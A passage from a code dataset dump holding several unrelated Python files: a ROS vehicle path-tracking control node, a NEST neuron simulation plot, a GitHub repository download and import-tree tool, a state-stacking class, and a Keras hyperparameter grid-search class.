while((time.time()-start_t)<1):\n send_packet(-30,10, 0)\n\n\ndef action_lane_left():\n start_t = time.time()# 시작 시간 저장\n while((time.time()-start_t)<3):\n send_packet(-30,10, 0) \n start_t = time.time()\n while((time.time()-start_t)<1):\n send_packet(0,5, 0)\n start_t = time.time()\n while((time.time()-start_t)<1):\n send_packet(30,10, 0)\n\n\ndef action_parking():\n start_t = time.time()\n while((time.time()-start_t)<6):\n send_packet(30,7, 0)\n\n start_t = time.time()\n while((time.time()-start_t)<2):\n send_packet(0,2, 0)\n\n start_t = time.time()\n while((time.time()-start_t)<5):\n send_packet(0,0, 0)\n\n start_t = time.time()\n while((time.time()-start_t)<3):\n send_packet(0,6, 2)\n\n start_t = time.time()\n while((time.time()-start_t)<3.5):\n send_packet(30,7, 0) \n \n\ndef action_break_crosswalk(cnt):\n start_t = time.time()\n while((time.time()-start_t)<5):\n send_packet(0,0, 0)\n\n\ndef serWrite(speed, steering, cnt, cur_mode):\n input_speed = speed\n break_val = 0x01\n if cur_mode == 'ctrl_normal':\n break_val = 0x01\n elif cur_mode=='ctrl_slow_1':\n speed*=0.6\n break_val = 0x01\n elif cur_mode=='ctrl_slow_2':\n speed*=0.3\n break_val = 0x01\n elif cur_mode=='ctrl_slow_3':\n speed*=0.3\n break_val=0x20\n elif cur_mode== 'ctrl_break':\n speed=0\n # break_val=0x60\n if input_speed <70:\n break_val = input_speed - int(0.4 *cur_speed)\n if break_val <= 0:\n break_val = 1\n if input_speed <100:\n break_val = input_speed + 10 - int(0.3 *cur_speed)\n if break_val <= 0:\n break_val = 1\n else:\n break_val = input_speed + 20 - int(0.3*cur_speed)\n if break_val <= 0:\n break_val = 1\n elif cur_mode== 'ctrl_E_break':\n speed=0\n break_val = 0xff\n elif cur_mode== 'ctrl_break_crosswalk':\n action_break_crosswalk()\n return\n elif cur_mode== 'ctrl_chng_right':\n action_lane_right()\n return\n elif cur_mode== 'ctrl_chng_left':\n action_lane_left()\n return\n elif cur_mode== 'ctrl_parking':\n action_parking()\n return\n print('speed : ', 
speed);\n print(\"ser_write\", speed, steering, cnt, cur_mode)\n # steering 값 2000 넘길 시 2000으로 설정\n if abs(steering)>2000:\n if steering>0:\n steering = 2000\n else :\n steering =-2000\n # 기어 기본값 0: 전진, 1:후진\n print(\"speed \", speed, \"steering \", steering, \"cnt : \", cnt)\n result = struct.pack('!BBBBBBHhBBBB', 0x53, 0x54, 0x58, 0x01, 0x00, 0x00, int(speed),\n steering, break_val, cnt, 0x0D, 0x0A ) # big endian 방식으로 타입에 맞춰서 pack \n print(\"pc : \", result[0], result[1], result[2], result[3], result[4], result[5], result[6], result[7], result[8],\n result[9], result[10], result[11], result[12], result[13] )\n ser.write(result)\n \n \ndef Y_angle(cur_x, cur_y, cur_yaw, target_x, target_y): # By 삼각함수 멋쟁이 예환\n print(\"Y_angle\", cur_x, cur_y, cur_yaw, target_x, target_y)\n yaw=radians(cur_yaw)\n th = cur_yaw - degrees(atan2((target_y - cur_y), (target_x - cur_x)))\n # delta = degrees(atan2(2*1.1*sin(radians(th))/look_ahead,1))\n if abs(th)>180:\n if (th < 0) :\n th += 360\n else :\n th -= 360\n\n print(\"Theta : \", th)\n if abs(th)>30:\n if th > 0:\n return 30\n else :\n return -30\n else :\n return int(th)\n\ndef cal_steering(cur_x, cur_y, cur_yaw, look_ahead):\n print(\"cal_steering\", cur_x, cur_y, cur_yaw) \n global path_idx\n print(\"path_idx\", path_idx) \n target_x = path_x[path_idx]\n target_y = path_y[path_idx]\n dis = pow(pow(abs(target_x - cur_x),2) + pow(abs(target_y - cur_y),2), 0.5)\n print(\"distance\", dis)\n if dis <= look_ahead:\n print(\"### HIT target!!! ###\")\n path_idx += 1\n return cal_steering(cur_x, cur_y, cur_yaw, look_ahead)\n else : \n return Y_angle(cur_x, cur_y, cur_yaw, target_x, target_y)\n\ndef cal_lookahead(vel):\n # look_ahead = k*vel/36 + 3.0\n look_ahead = 3.3\n return look_ahead\n\n# msg 수신시 호출되는 함수\ndef getSyncMsg(msg):\n print(msg)\n global first_chk\n global path_idx\n print(\"======== get a odo msg =========\")\n cur_x = msg.gps_x\n cur_y = msg.gps_y\n cur_yaw = msg.imu_yaw\n cur_mode = msg.ctrl_mode\n print(cur_yaw)\n \n if(first_chk):\n find_first_pathidx(cur_x, cur_y, cur_yaw)\n\n if cur_yaw > 90 and cur_yaw < 270:\n cur_yaw = -(cur_yaw-90);\n else :\n if cur_yaw < 90:\n cur_yaw = (90-cur_yaw);\n else :\n cur_yaw = 360-cur_yaw +90 \n\n cnt=0x00;\n #print('a')\n print('before')\n result = ser.readline() # erp -> pc\n print('after')\n #print(result) \n if path_idx != len(path_k):\n if abs(path_k[path_idx]) > 0.002 :\n if cur_mode == 2:\n cur_mode = 1\n\n print(\"len\", len(result)) \n if len(result) > 17:\n print(\"erp : \", result[0], result[1], result[2], result[3], result[4], result[5], result[6], result[7], result[8],\n result[9], result[10], result[11], result[12], result[13], result[14], result[15], result[16], result[17])\n cnt = result[15]\n print(cnt)\n look_ahead = cal_lookahead(result[6])\n steering = cal_steering(cur_x, cur_y, cur_yaw, look_ahead);\n serWrite(int(speed_lim*10), int(steering*71), cnt, cur_mode)\n # cnt가 10일때 패킷이 잘려서 2번에 걸쳐 들어옴.+++++++++++++++++++++++++++++ 0x0a값이 아스키코드 LF(new line)!!!\n elif len(result) == 16:\n print(\"erp : \", result[0], result[1], result[2], result[3], result[4], result[5], result[6], result[7], result[8],\n result[9], result[10], result[11], result[12], result[13], result[14], result[15])\n add_result = ser.readline() # erp -> pc\n print(cnt) \n look_ahead = cal_lookahead(result[6])\n steering = cal_steering(cur_x, cur_y, cur_yaw, look_ahead);\n serWrite(int(speed_lim*10), int(steering*71), 10, cur_mode)\n # serWrite(int(speed_lim*10), int(steering*71), 10, cur_mode)\n print(\"cur_speed : \" , 
result[7])\n\ndef find_first_pathidx(cur_x, cur_y, cur_yaw):\n global path_idx\n global first_chk\n min_idx = 0\n min_dis = 9999999999\n size = len(path_x)\n for i in range(size):\n x = path_x[i]\n y = path_y[i]\n dis = (x-cur_x)**2 + (y-cur_y)**2\n if(min_dis > dis):\n min_dis = dis\n min_idx = i\n print(\"fin_dis : \", min_dis)\n print(\"fin_idx : \", min_idx)\n path_idx = min_idx\n first_chk = False\n yaw = Y_angle(cur_x, cur_y, cur_yaw, path_x[min_idx], path_y[min_idx])\n if(abs(yaw)>90):\n path_idx += 1\n\n\n\ndef main(): \n with open('/home/wego/catkin_ws/src/master/src/waypoint/path2.csv', mode='r') as csv_file:\n # with open('/home/wego/catkin_ws/src/master/src/waypoint/k-city_test_1.csv', mode='r') as csv_file:\n csv_reader = csv.DictReader(csv_file)\n for next_r in csv_reader:\n path_x.append(float(next_r['X']))\n path_y.append(float(next_r['Y']))\n path_k.append(float(next_r['K']))\n print(\"local_x \",float(next_r['X']))\n print(\"local_y \",float(next_r['Y']))\n\n rospy.init_node('control_node', disable_signals=False)\n rospy.loginfo(\"-------control node start!-------\")\n rospy.Subscriber(\"/master\", sync_msg, getSyncMsg)\n rospy.loginfo(\"-------start spin-------\")\n rospy.spin()\n rospy.loginfo(\"-------finish spin-------\")\n \n \nif __name__ == '__main__':\n print(\"Pure pursuit path tracking simulation start\")\n main()","repo_name":"gigacha/Control","sub_path":"control_test/src/control_node.py","file_name":"control_node.py","file_ext":"py","file_size_in_byte":9094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34773601939","text":"#! /usr/bin/env python\n\n\"\"\"\nPlot several runs of the iaf_cond_exp_sfa_rr neuron with no input and\nvarious initial values for the membrane potential.\n\"\"\"\n\nimport nest \nimport numpy\nimport pylab\n\nfor vinit in numpy.arange(-100, -50, 10, float):\n\n nest.ResetKernel()\n\n cbn = nest.Create('iaf_cond_exp_sfa_rr')\n\n # set the initial membrane potential\n nest.SetStatus(cbn, 'V_m', vinit)\n\n voltmeter = nest.Create('voltmeter')\n nest.SetStatus(voltmeter, {'withtime': True})\n nest.Connect(voltmeter, cbn)\n\n nest.Simulate(75.0)\n\n t = nest.GetStatus(voltmeter,\"events\")[0][\"times\"]\n v = nest.GetStatus(voltmeter,\"events\")[0][\"V_m\"]\n\n pylab.plot(t, v, label=\"initial V_m=%.2f mV\" % vinit)\n\npylab.legend(loc=4)\npylab.xlabel(\"time (ms)\")\npylab.ylabel(\"V_m (mV)\")\npylab.show()\n","repo_name":"animesh/misccb","sub_path":"vinit_example.py","file_name":"vinit_example.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"15457831109","text":"import config\nimport requests, os, re, string, shutil\nfrom github import Github\nimport zipfile\n\ng = Github(config.GITHUB_TOKEN)\nturnOff = False\nfirstPath = os.getcwd()\n\ndef splitList(_list):\n newList = []\n currentList = []\n x = 0\n for el in _list:\n if len(currentList) == 10 or x == len(_list):\n newList.append(currentList)\n currentList.clear()\n else:\n currentList.append(el)\n x+=1\n\ndef search_github(keywords):\n query = '+'.join(keywords) + '+in:readme+in:description'\n result = g.search_repositories(query, 'stars', 'desc')\n print(f'Found {result.totalCount} repo(s)')\n x = 0\n y = 0\n for repo in result:\n print(str(x) + \".\", repo.clone_url, repo.stargazers_count, \"stars\")\n x += 1\n choice = \"\"\n while choice != \"exit\":\n text = \"\"\"\n\\tType `page (number)` for go repository 
page.\n\\tType `exit` for leave to main menu.\n\\tType `all` for install all repositories from printed.\n\\tType id for install specific repository (eg. 1).\n\"\"\"\n print(text)\n choice = input(\"Your choice: \")\n try:\n choice = int(choice)\n print(choice, \"it is\")\n except:\n if choice == \"all\":\n print(\"all it is\")\n\ndef download_folder(url):\n r = requests.get(url, stream = True)\n zippedPath = firstPath + \"/projects/zipped/\"\n unzippedPath = firstPath + \"/projects/unzipped/\"\n with open(zippedPath + url.split(\"/\")[4]+\".zip\", \"wb\") as repo:\n for chunk in r.iter_content(chunk_size=1024):\n if chunk:\n repo.write(chunk)\n with zipfile.ZipFile(zippedPath + url.split(\"/\")[4]+\".zip\", 'r') as zip_ref:\n zip_ref.extractall(unzippedPath)\n print(\"Repository installed successfully.\")\n\ndef checkModules(pythonFiles, path):\n modules = []\n for file in pythonFiles:\n fileLines = open(file, \"r\").readlines()\n for line in fileLines:\n if line.startswith(\"#\"): continue\n if line.find(\"import \") >= 0:\n if line.find(\"=\") >= 0: continue\n if line.find(\"from \") >= 0:\n from_ = line.split(\"import\")[0]\n from_ = from_.replace(\"from \", \"\")\n if from_.find(\".\") >= 0: from_ = from_.split(\".\")[0].replace(\" \", \"\")\n module = from_\n alias = None\n prefunctions = []\n dotspl = str(str(line.split(\" import \")[0]).split(\"from \")).split(\".\")\n del dotspl[0]\n if line.find(\" as \") >= 0:\n alias = str(line.split(\" as \")[1].replace(\"\\n\", \"\")).replace(\" \", \"\")\n else:\n line = line.replace(\"from \", \"\")\n if line.split(\"import\")[1].find(\",\")>=0:\n alias = []\n for submod in line.split(\"import\")[1].split(\",\"):\n submod = str(submod.replace(\"\\n\", \"\")).replace(\" \", \"\")\n alias.append(submod)\n else:\n alias = str(line.split(\"import\")[1].replace(\" \", \"\")).replace(\"\\n\", \"\")\n for dot in dotspl:\n if dot.find(\" as \") >= 0:\n dot = dot.split(\" as \")[0]\n prefunctions.append(str(dot.replace(\" \", \"\")).replace(\"\\n\", \"\"))\n if module != \"*\":\n if module in [x['module'] for x in modules]:\n samem = [x for x in modules if x['module'] == module][0]\n if type(samem['alias']) != list:\n salias = samem['alias']\n samem['alias'] = list()\n samem['alias'].append(salias)\n samem['alias'].append(alias)\n else:\n if type(alias) == list:\n for alias in alias:\n samem['alias'].append(alias)\n else:\n samem['alias'].append(alias)\n for prefunc in range(len(prefunctions)):\n for character in string.punctuation:\n if character == \"_\": continue\n prefunctions[prefunc] = prefunctions[prefunc].replace(character, '')\n if samem['prefunctions'] == None:\n samem['prefunctions'] = list()\n samem['prefunctions'].extend(prefunctions)\n else:\n samem['prefunctions'].extend(prefunctions)\n modules = [x for x in modules if not x['module'] == module] + [samem]\n else:\n arr = {\"module\": module, \"alias\": alias, \"prefunctions\": prefunctions}\n modules.append(arr)\n elif line.find(\",\") >= 0:\n for module in str(line.split(\"import\")[1]).split(\",\"):\n module = module.replace(\"\\n\", \"\")\n alias = None\n if module.find(\" as \") >= 0:\n moas = module.split(\" as \")\n module = str(moas[0].replace(\"\\n\", \"\")).replace(\" \", \"\")\n alias = str(moas[1].replace(\"\\n\", \"\")).replace(\" \", \"\")\n puncs = 0\n for char in module:\n if char in string.punctuation:\n puncs += 1\n if puncs > 0: continue\n if module != \"*\":\n arr = {\"module\": module, \"alias\": alias, \"prefunctions\": None}\n modules.append(arr)\n elif 
line.find(\".\") >= 0:\n module = str(line.split(\"import\")[1]).split(\".\")[0]\n alias = None\n prefunctions = []\n dotspl = str(line.split(\"import\")[1]).split(\".\")\n del dotspl[0]\n if line.find(\" as \") >= 0:\n moas = line.split(\" as \")\n module = str(str(line.split(\"import\")[1]).split(\".\")[0].replace(\" \", \"\")).replace(\"\\n\", \"\")\n alias = str(moas[1].replace(\"\\n\", \"\")).replace(\" \", \"\")\n for dot in dotspl:\n if dot.find(\" as \") >= 0:\n dot = dot.split(\" as \")[0]\n prefunctions.append(str(dot.replace(\" \", \"\")).replace(\"\\n\", \"\"))\n puncs = 0\n for char in module:\n if char in string.punctuation:\n puncs += 1\n if puncs > 0: continue\n for prefunc in range(len(prefunctions)):\n for character in string.punctuation:\n if character == \"_\": continue\n prefunctions[prefunc] = prefunctions[prefunc].replace(character, '')\n if module != \"*\":\n arr = {\"module\": module, \"alias\": alias, \"prefunctions\": prefunctions}\n modules.append(arr)\n else:\n module = line.split(\"import\")[-1].replace(\"\\n\", \"\")\n alias = None\n if module.find(\" as \") >= 0:\n moas = module.split(\" as \")\n module = str(moas[0].replace(\" \", \"\")).replace(\"\\n\", \"\")\n alias = moas[1].replace(\"\\n\", \"\")\n puncs = 0\n for char in module:\n if char in string.punctuation:\n puncs += 1\n if puncs > 0: continue\n if module != \"*\":\n arr = {\"module\": module, \"alias\": alias, \"prefunctions\": None}\n modules.append(arr)\n return modules\n\ndef makeModuleList(modules):\n moduleList = {}\n for module in modules:\n orgmodule = module\n module = module['module'].replace(\" \", \"\")\n moduleList[module] = []\n if type(orgmodule['prefunctions']) == list:\n if len(orgmodule['prefunctions']) > 0:\n for prefunc in orgmodule['prefunctions']:\n for character in string.punctuation:\n if character == \"_\": continue\n prefunc = prefunc.replace(character, '')\n moduleList[module].append(prefunc)\n return moduleList\n\ndef checkFunctions(modules, pythonFiles, moduleList):\n for file in pythonFiles:\n fileLines = open(file, \"r\").readlines()\n for line in fileLines:\n if line.startswith(\"#\"): continue\n for module in modules:\n orgmodule = module['module']\n try:\n if module['alias']:\n modulee = module['alias']\n else:\n modulee = module['module']\n except:\n modulee = module['module']\n if type(modulee) == list:\n for module in modulee:\n if type(module) != str: continue\n if line.find(module + \".\") >= 0 and line.find(\"import\") < 0 and line.find(\"from\") < 0:\n try:\n functionList = re.findall(r\"{}\\.(.*?)\\(\".format(module), line)\n except:\n continue\n for function in functionList:\n if function.find(\".\") >= 0:\n function = function.replace(\".\", \" -> \")\n if function.find(\"=\") >= 0: function = function.split(\"=\")[1]\n puncs = 0\n for char in function:\n if char != \"_\" and char in string.punctuation:\n puncs += 1\n if puncs > 0:\n continue\n else:\n moduleList[orgmodule.replace(\" \", \"\")].append(function)\n elif line.find(orgmodule + \".\") >= 0 and line.find(\"import \") >= 0 and line.split(\"import \")[1].find(\".\") >= 0 and line.find(\"from\") < 0:\n funt = line.split(\"import \")[1]\n f = funt.split(\".\")\n f[1] = f[1].replace(\"\\n\", \"\")\n f[0] = f[0].replace(\" \", \"\")\n function = \"\"\n if len(f) > 2:\n del f[0]\n x = 1\n for frrom in f:\n if x == len(f):\n function += \" \" + frrom\n elif x == 1:\n function += frrom + \" ->\"\n else:\n function += \" \" + frrom + \" ->\"\n x+=1\n else:\n function = f[1]\n if function.find(\"as\") >= 
0: function = function.split(\" as \")[0]\n puncs = 0\n for char in function:\n if char != \"_\" and char in string.punctuation:\n puncs += 1\n if puncs > 0:\n continue\n moduleList[orgmodule.replace(\" \", \"\")].append(function) \n else:\n module = modulee\n if line.find(module + \".\") >= 0 and line.find(\"import\") < 0 and line.find(\"from\") < 0:\n functionList = re.findall(module + r\"\\.(.*?)\\(\", line)\n for function in functionList:\n if function.find(\".\") >= 0:\n function = function.replace(\".\", \" -> \")\n if function.find(\"=\") >= 0: function = function.split(\"=\")[1]\n puncs = 0\n for char in function:\n if char != \"_\" and char in string.punctuation:\n puncs += 1\n if puncs > 0:\n continue\n else:\n moduleList[orgmodule.replace(\" \", \"\")].append(function)\n elif line.find(orgmodule + \".\") >= 0 and line.find(\"import \") >= 0 and line.split(\"import \")[1].find(\".\") >= 0 and line.find(\"from\") < 0:\n funt = line.split(\"import \")[1]\n f = funt.split(\".\")\n f[1] = f[1].replace(\"\\n\", \"\")\n f[0] = f[0].replace(\" \", \"\")\n function = \"\"\n if len(f) > 2:\n del f[0]\n x = 1\n for frrom in f:\n if x == len(f):\n function += \" \" + frrom\n elif x == 1:\n function += frrom + \" ->\"\n else:\n function += \" \" + frrom + \" ->\"\n x+=1\n else:\n function = f[1]\n if function.find(\"as\") >= 0: function = function.split(\" as \")[0]\n puncs = 0\n for char in function:\n if char != \"_\" and char in string.punctuation:\n puncs += 1\n if puncs > 0:\n continue\n moduleList[orgmodule.replace(\" \", \"\")].append(function)\n return moduleList\n\ndef formatModuleList(modules, moduleList):\n for module in modules:\n module = module['module']\n module = module.replace(\" \", \"\")\n moduleList[module] = list(set(moduleList[module]))\n moduleList[module] = [x for x in moduleList[module] if x != \"\"]\n return moduleList\n\ndef createTree(moduleList, path):\n treePath = firstPath + \"/trees/\" + path.split(\"/\")[-1] + \"/\"\n try:\n open(treePath + \"tree.txt\", \"w\")\n except:\n os.mkdir(treePath) \n open(treePath + \"tree.txt\", \"w\")\n for module in moduleList:\n module = module.replace(\" \", \"\")\n agac = open(treePath + \"tree.txt\", \"r\").read()\n open(treePath + \"tree.txt\", \"w\").write(agac + module + \"\\n\")\n if len(moduleList[module]) > 0:\n moduleList[module] = sorted(moduleList[module])\n for function in moduleList[module]:\n agac = open(treePath + \"tree.txt\", \"r\").read()\n open(treePath + \"tree.txt\", \"w\").write(agac + \"\\t\" + function + \"\\n\")\n return True\n\ndef repoCheck(path):\n os.chdir(path)\n pythonFiles = [os.getcwd()+\"/\" + x for x in os.listdir(os.getcwd()) if x.endswith(\".py\")]\n directories = [x[0] for x in os.walk(os.getcwd())]\n del directories[0]\n\n for directory in directories:\n pythonFiles = pythonFiles + [directory+\"/\" + x for x in os.listdir(directory) if x.endswith(\".py\")]\n pythonFiles = list(set(pythonFiles))\n\n modules = checkModules(pythonFiles, firstPath)\n moduleList = makeModuleList(modules)\n moduleList = checkFunctions(modules, pythonFiles, moduleList)\n moduleList = formatModuleList(modules, moduleList)\n tree = createTree(moduleList, path)\n os.chdir(firstPath)\n return tree\n\ndef checkRepos():\n repoPath = firstPath + \"/projects/unzipped/\"\n repos = [x for x in os.listdir(repoPath) if os.path.isdir(repoPath + x) == True]\n if len(repos) == 0:\n print(\"No repositories found.\")\n else:\n selected = \"\"\n while selected != \"exit\":\n x = 0\n for repo in repos:\n print(str(x) + \".\", 
repo)\n                x+=1\n            text = \"\"\"\n\\tType `exit` to return to the main menu.\n\\tType `all` to check all repositories and create tree schemes.\n\\tType the id of a repository to check that specific repository.\n\"\"\"\n            print(text)\n            selected = input(\"Your choice: \")\n            if selected == \"all\":\n                for repo in repos:\n                    try:\n                        check = repoCheck(repoPath + repo)\n                        print(\"Tree creation for \" + repo + \" successfully finished.\" if check == True else \"Tree couldn't be created successfully for \" + repo)\n                    except Exception as e:\n                        print(\"Tree couldn't be created successfully for\", repo)\n                        print(\"Error:\", e)\n            elif selected == \"exit\":\n                break\n            else:\n                try:\n                    selected = int(selected)\n                    try:\n                        check = repoCheck(repoPath + repos[selected])\n                        print(\"Tree creation for \" + repos[selected] + \" successfully finished.\" if check == True else \"Tree couldn't be created successfully for \" + repos[selected])\n                    except Exception as e:\n                        print(\"Tree couldn't be created successfully for\", repos[selected])\n                        print(\"Error:\", e)\n                except Exception as e:\n                    print(\"Please select a choice from the menu!\")\n\ndef eraseData():\n    folders = [firstPath + \"/trees\", firstPath + \"/projects/unzipped\", firstPath + \"/projects/zipped\"]\n    for folder in folders:\n        for filename in os.listdir(folder):\n            file_path = os.path.join(folder, filename)\n            try:\n                if os.path.isfile(file_path) or os.path.islink(file_path):\n                    if not file_path.find(\"__init__.py\") >=0:\n                        os.unlink(file_path)\n                elif os.path.isdir(file_path):\n                    shutil.rmtree(file_path)\n                print(\"Successfully cleared path: %s\" % file_path)\n            except Exception as e:\n                print('Failed to delete %s. Reason: %s' % (file_path, e))\n    print(\"Done erasing.\")\n\ndef checkChoice(choice):\n    global turnOff\n    if choice == 0:\n        turnOff = True\n    elif choice == 1:\n        print(\"Under maintenance!\")\n        #keywords = input('Enter keyword(s)[e.g python, flask, postgres]: ')\n        #search_github([keyword.strip() for keyword in keywords.split(',')])\n    elif choice == 2:\n        url = input('Enter folder url: ')\n        download_folder(url)\n    elif choice == 3:\n        checkRepos()\n    elif choice == 4:\n        eraseData()\n    \nwelcomeText = f\"\"\"\n\\tWelcome to RepoChecker v{config.VERSION}\n\\n\n\\t0. Exit\n\\t1. Search with keywords. (Maintenance)\n\\t2. Download public repository.\n\\t3. Check downloaded repositories.\n\\t4. Erase all data.\n\"\"\"\nwhile turnOff == False:\n    print(welcomeText)\n    try:\n        choice = int(input(\"Select from menu (e.g.
 1): \"))\n    except:\n        print(\"Choice must be an integer!\")\n        continue\n    checkChoice(choice)","repo_name":"MrMirhan/RepoChecker","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":19894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1162762157","text":"import numpy as np\n\nfrom collections import deque\n\nclass State:\n    def __init__(self, state, params):\n        self.state = state.copy()\n        self.params = params.copy()\n\ndef preprocess(config, state, params):\n    st = State(state, params)\n    st.state = st.state.astype(np.float32)\n    st.params = st.params.astype(np.float32)\n\n    return st\n\nclass stacked_env:\n    def __init__(self, config):\n        self.config = config\n        self.max_len = config.get('state_stack_size')\n\n        self.stack = deque(maxlen=self.max_len)\n\n    def append(self, state, params):\n        st = preprocess(self.config, state, params)\n        if len(self.stack) == 0:\n            self.reset(st)\n        else:\n            self.stack.append(st)\n\n    def current(self):\n        states = [st.state for st in self.stack]\n        params = [st.params for st in self.stack]\n\n        states = np.stack(states, axis=0)[-1]\n        params = np.stack(params, axis=0)[-1]\n\n        return State(states, params)\n\n    def reset(self, st):\n        for _ in range(self.max_len):\n            self.stack.append(st)\n\n","repo_name":"bioothod/atari_gym_impala_client","sub_path":"env.py","file_name":"env.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1687925482","text":"from Model.modelEnum import Environment\nfrom Constraints.hyperparameters import *\nfrom tensorflow.keras.optimizers import SGD\nfrom sklearn.model_selection import GridSearchCV\nfrom tensorflow.keras.constraints import max_norm\nfrom tensorflow.python.keras.models import Sequential\nfrom Exception.parametersException import IncorrectVariableType\nfrom tensorflow.python.keras.wrappers.scikit_learn import KerasClassifier\nfrom Structures.NeuralNetworks.neuralNetworkEnum import AttributeToTuneEnum\nfrom tensorflow.python.keras.layers import Dense, Conv2D, MaxPool2D, Flatten, Dropout\nfrom Structures.NeuralNetworks.NeuralNetworksTypes.convolutionalNeuralNetwork import ConvolutionalNeuralNetwork\n\n\nclass HyperparameterOptimization:\n    \"\"\"\n    A class to get the optimal value for the hyperparameters of a convolutional neural network model.\n\n    Attributes\n    ----------\n    logger : Logger\n        A class used to show the execution information\n    model : Model\n        A class used to sync up all the functionalities that refer to the database\n    nn_util : NeuralNetworkUtil\n        A class to execute the common functionalities of a neural network structure\n    cnn : ConvolutionalNeuralNetwork\n        A class that contains the convolutional neural network structure and all its functionalities\n    parameters_switcher : dictionary\n        Dictionary that will return the function implementing the optimizer module based on the AttributeToTuneEnum\n        enumerator\n    \n    Methods\n    -------\n    calculate_best_hyperparameter_optimization(attribute_tune)\n        Calculate the best value for the CNN module based on the attribute selected\n    \"\"\"\n    \n    def __init__(self, logger, model, nn_util):\n        \"\"\"\n        logger : Logger\n            A class used to show the execution information\n        model : Model\n            A class used to sync up all the functionalities that refer to the database\n        nn_util : NeuralNetworkUtil\n            A class to execute the common functionalities of a neural network structure\n        \"\"\"\n\n        self.model = model\n        self.logger = 
logger\n self.nn_util = nn_util\n self.cnn = ConvolutionalNeuralNetwork(logger, model, nn_util)\n\n self.parameters_switcher = self.__get_parameter_switcher()\n\n def calculate_best_hyperparameter_optimization(self, attribute_tune):\n \"\"\"Calculate the best value for the CNN module based on the attribute selected\n\n Parameters\n ----------\n attribute_tune : AttributeToTuneEnum\n Attribute to be optimized\n\n Raises\n ------\n IncorrectVariableType\n If the attribute_tune variable is not an AttributeToTuneEnum enumeration\n \"\"\"\n\n if not isinstance(attribute_tune, AttributeToTuneEnum):\n raise IncorrectVariableType(\"Expecting AttributeToTuneEnum enumeration\")\n\n n_classes, image_size = self.__prepare_data()\n grid = self.__get_grid_search_classifier(attribute_tune, n_classes, image_size)\n grid_result = self.__train_convolutional_neural_network(grid)\n \n self.__summarize_results(grid_result)\n\n def __get_grid_search_classifier(self, attribute_tune, n_classes, image_size):\n parameters_function = self.parameters_switcher.get(attribute_tune)\n param_grid, classifier = parameters_function(n_classes, image_size)\n grid = GridSearchCV(estimator=classifier, param_grid=param_grid, n_jobs=1, cv=3)\n return grid\n\n def __prepare_data(self):\n shape_train = self.model.get_x(Environment.TRAIN).shape\n n_classes = self.cnn.prepare_images()\n return n_classes, shape_train[1:]\n\n def __train_convolutional_neural_network(self, grid):\n x_train = self.model.get_x(Environment.TRAIN)\n y_train = self.model.get_y(Environment.TRAIN)\n grid_result = grid.fit(x_train, y_train)\n return grid_result\n\n @staticmethod\n def __get_parameters_for_batch_epochs(n_classes, image_size):\n batch_size = [10, 20, 40, 60, 80, 100]\n epochs = [10, 50, 100]\n\n param_grid = dict(batch_size=batch_size, epochs=epochs, num_classes=[n_classes], image_size=[image_size])\n classifier = KerasClassifier(build_fn=create_model_batch_epochs, verbose=2)\n\n return param_grid, classifier\n\n @staticmethod\n def __get_parameters_for_optimization_algorithm(n_classes, image_size):\n optimizer = ['SGD', 'RMSprop', 'Adagrad', 'Adadelta', 'Adam', 'Adamax', 'Nadam']\n\n param_grid = dict(optimizer=optimizer, num_classes=[n_classes], image_size=[image_size])\n classifier = KerasClassifier(build_fn=create_model_optimizer_algorithm, epochs=EPOCHS, batch_size=BATCH_SIZE,\n verbose=2)\n\n return param_grid, classifier\n\n @staticmethod\n def __get_parameters_for_learn_rate_and_momentum(n_classes, image_size):\n learn_rate = [0.001, 0.01, 0.1, 0.2, 0.3]\n momentum = [0.0, 0.2, 0.4, 0.6, 0.8, 0.9]\n\n param_grid = dict(learn_rate=learn_rate, momentum=momentum, num_classes=[n_classes], image_size=[image_size])\n classifier = KerasClassifier(build_fn=create_model_learn_rate_and_momentum, epochs=EPOCHS,\n batch_size=BATCH_SIZE, verbose=2)\n\n return param_grid, classifier\n\n @staticmethod\n def __get_parameters_network_weight_init(n_classes, image_size):\n init_mode = ['uniform', 'lecun_uniform', 'normal', 'zero', 'glorot_normal', 'glorot_uniform', 'he_normal',\n 'he_uniform']\n\n param_grid = dict(init_mode=init_mode, num_classes=[n_classes], image_size=[image_size])\n classifier = KerasClassifier(build_fn=create_model_network_weight_init, epochs=EPOCHS, batch_size=BATCH_SIZE,\n verbose=2)\n\n return param_grid, classifier\n\n @staticmethod\n def __get_parameters_neuron_activation_function(n_classes, image_size):\n activation = ['relu', 'softmax', 'softplus', 'softsign', 'tanh', 'sigmoid', 'hard_sigmoid', 'linear']\n\n param_grid = 
dict(activation=activation, num_classes=[n_classes], image_size=[image_size])\n classifier = KerasClassifier(build_fn=create_model_neuron_activation_function, epochs=EPOCHS,\n batch_size=BATCH_SIZE, verbose=2)\n\n return param_grid, classifier\n\n @staticmethod\n def __get_parameters_dropout_regularization(n_classes, image_size):\n weight_constraint = [1, 2, 3, 4, 5]\n dropout_rate = [0.0, 0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9]\n\n param_grid = dict(dropout_rate=dropout_rate, weight_constraint=weight_constraint, num_classes=[n_classes],\n image_size=[image_size])\n classifier = KerasClassifier(build_fn=create_model_dropout_regularization, epochs=EPOCHS, batch_size=BATCH_SIZE,\n verbose=2)\n\n return param_grid, classifier\n\n @staticmethod\n def __get_parameters_number_neurons(n_classes, image_size):\n neurons_conv_layer = [1, 5, 10, 15, 20, 25, 30, 40, 50, 60, 80, 100, 120, 140]\n neurons_dense_layer = [10, 20, 25, 30, 40, 50, 60, 80, 100, 120, 140]\n\n param_grid = dict(neurons_conv_layer=neurons_conv_layer, neurons_dense_layer=neurons_dense_layer,\n num_classes=[n_classes], image_size=[image_size])\n classifier = KerasClassifier(build_fn=create_model_number_neurons, epochs=EPOCHS, batch_size=BATCH_SIZE,\n verbose=2)\n\n return param_grid, classifier\n\n def __summarize_results(self, grid_result):\n self.logger.write_info(\"Best: %f using %s\" % (grid_result.best_score_, grid_result.best_params_))\n means = grid_result.cv_results_['mean_test_score']\n stds = grid_result.cv_results_['std_test_score']\n params = 